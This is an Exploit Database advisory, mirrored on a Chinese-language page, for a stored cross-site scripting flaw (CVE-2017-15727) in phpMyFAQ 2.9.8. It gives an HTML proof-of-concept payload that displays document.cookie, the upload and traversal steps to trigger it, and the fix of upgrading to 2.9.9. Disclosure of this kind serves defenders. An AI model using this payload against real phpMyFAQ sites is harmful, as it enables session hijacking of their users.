PHPMyFAQ 2.9.8 – Cross-Site Scripting (3)

• Exploit Database
• 43 阅读

• 作者： Nikhil Mittal
  日期： 2017-10-28
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/43063/

• # Exploit Title: phpMyFAQ 2.9.8 Stored XSS Vulnerability 
  # Date: 28-9-2017
  # Exploit Author: Nikhil Mittal (Payatu Labs)
  # Vendor Homepage: http://www.phpmyfaq.de/
  # Software Link: http://download.phpmyfaq.de/phpMyFAQ-2.9.8.zip 
  # Version: 2.9.8
  # Tested on: MAC OS
  # CVE : 2017-15727
  
  1. Description
  
  In phpMyFAQ before 2.9.9, there is Stored Cross-site Scripting (XSS) via an HTML attachment.
  
  2. Proof of concept
  
  Exploit code
  
  <!DOCTYPE html>
  <html>
  <head>
  <title>XSS EXPLOIT</title>
  </head>
  <body>
  <script>confirm(document.cookie)</script>
  </body>
  </html>
  
  
  
  Steps to reproduce:
  
  1. Create a user having limited access rights to attachment section 
  2. Goto http://localhost/phpmyfaq/admin/?action=editentry
  2. Upload the exploit code with .html extension at the place of attachements
  3. Access the file url generated at /phpmyfaq/attachments/<random_path>
  4. Reach to last file using directory traversal and XSS will triage 
  
  3. Solution 
  
  Update to phpMyFAQ Version 2.9.9
  http://download.phpmyfaq.de/phpMyFAQ-2.9.9.zip